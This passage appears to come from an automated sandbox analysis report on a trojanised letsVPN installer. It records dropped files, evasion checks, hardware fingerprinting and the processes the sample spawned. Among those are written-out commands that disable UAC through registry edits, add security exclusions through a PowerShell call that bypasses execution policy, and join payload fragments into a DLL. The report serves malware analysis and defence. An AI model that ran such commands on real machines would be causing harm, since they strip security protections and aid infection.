              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsProcess.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll
              Source: C:\Windows\System32\drvinst.exe, Dropped PE file which has not been started: C:\Windows\System32\drivers\tap0901.sys (copy)
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dll
              Source: C:\ProgramData\letsvpn-latest.exe, Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe, API coverage: 0.1 %
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, API coverage: 6.4 %
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe, API coverage: 7.6 %
              Source: C:\Windows\System32\svchost.exe TID: 7784, Thread sleep time: -30000s >= -30000s
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe TID: 1252, Thread sleep count: 117 > 30
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe TID: 1252, Thread sleep time: -58500s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 1888, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 7932, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 7088, Thread sleep time: -30680s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3060, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3688, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3748, Thread sleep time: -300000s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 3688, Thread sleep time: -215098s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 5656, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 4816, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 5044, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 6204, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe TID: 5388, Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe, File opened: PhysicalDrive0
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BaseBoard
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select SerialNumber From Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeLast function: Thread delayed
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\ProgramData\letsvpn-latest.exeFile Volume queried: C:\Program Files (x86) FullSizeInformation
              Source: C:\ProgramData\letsvpn-latest.exeFile Volume queried: C:\Program Files (x86) FullSizeInformation
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CEB97 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,__fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CEB97
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CC41C _mbsdec,_mbscmp,_mbscmp,_strdup,strlen,_calloc_crt,__cftof,strcpy_s,_mbsicmp,_invoke_watson,_malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,17_2_6C5CC41C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CE748 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,_errno,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CE748
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CC385 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,17_2_6C5CC385
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDCF7 _wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDCF7
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C565C91 _wstat64i32,_wcspbrk,towlower,FindFirstFileExW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,_getdrive,GetLastError,GetLastError,_wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,GetDriveTypeW,free,free,_wsopen_s,__fstat64i32,_close,_errno,__dosmaperr,FindClose,__dosmaperr,FindClose,17_2_6C565C91
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDF35 _wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDF35
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CD86F _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CD86F
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDA9B _wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDA9B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CF00C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CF00C
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,19_2_00405C4D
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_0040689E FindFirstFileW,FindClose,19_2_0040689E
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00402930 FindFirstFileW,19_2_00402930
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A10D0 GetCurrentProcess,GetProcAddress,FindFirstFileW,28_2_00007FF7132A10D0
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A1110 FindFirstFileW,28_2_00007FF7132A1110
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A71EC GetWindowsDirectoryW,FindFirstFileW,__iob_func,__iob_func,__iob_func,FindNextFileW,FindClose,28_2_00007FF7132A71EC
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00854318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,53_2_00854318
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00865490 FindFirstFileExW,53_2_00865490
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180006940 GetSystemInfo,GlobalMemoryStatusEx,0_2_0000000180006940
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 300000
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 215098
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq$Hyper-V Hypervisor Logical Processor
              Source: svchost.exe, 00000023.00000003.2722572434.000002822711D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@vmnetextension
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq!Hyper-V Virtual Machine Bus Pipes
              Source: mmc.exe, 0000000F.00000002.3899626657.0000000003864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: mmc.exe, 00000012.00000002.3898317237.0000000002D28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\>
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq)Hyper-V Hypervisor Root Virtual Processor
              Source: LetsPRO.exe, 00000038.00000002.3957234819.000000005BBA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorl
              Source: svchost.exe, 0000000C.00000002.3904085354.000001CF4D444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3904362361.000001CF4D457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3898635036.000001CF47C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000023.00000003.2723631251.0000028227117000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ethernetwlanppipvmnetextension4C}
              Source: svchost.exe, 00000023.00000003.2722572434.000002822711D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @vmnetextension
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq!Hyper-V Hypervisor Root Partition
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq*Hyper-V Dynamic Memory Integration Service
              Source: sinaplayer_service.exe, 00000011.00000002.3894778034.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm2_
              Source: letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VirtualMachine
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-15880
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-17151
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-17172
              Source: C:\ProgramData\letsvpn-latest.exeAPI call chain: ExitProcess graph end node
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A038 IsDebuggerPresent,InitializeCriticalSectionAndSpinCount,DeleteCriticalSection,0_2_000000018002A038
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000DDF0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_000000018000DDF0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5F08AC VirtualProtect ?,-00000001,00000104,?,?,?,0000001C17_2_6C5F08AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800057CD LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,std::ios_base::_Ios_base_dtor,0_2_00000001800057CD
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00865217 mov eax, dword ptr fs:[00000030h]53_2_00865217
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085EDE2 mov eax, dword ptr fs:[00000030h]53_2_0085EDE2
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800278D5 _errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,0_2_00000001800278D5
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess token adjusted: Debug
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00397D98 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter,17_2_00397D98
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5F480C __crtUnhandledException,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6C5F480C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C57C7DB __crtSetUnhandledExceptionFilter,SetUnhandledExceptionFilter,17_2_6C57C7DB
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A7680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF7132A7680
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A1178 SetUnhandledExceptionFilter,28_2_00007FF7132A1178
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A7798 SetUnhandledExceptionFilter,28_2_00007FF7132A7798
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085DAD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_0085DAD2
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00858A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00858A28
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00858E32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00858E32
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00858FC5 SetUnhandledExceptionFilter,53_2_00858FC5
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe "C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe"
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
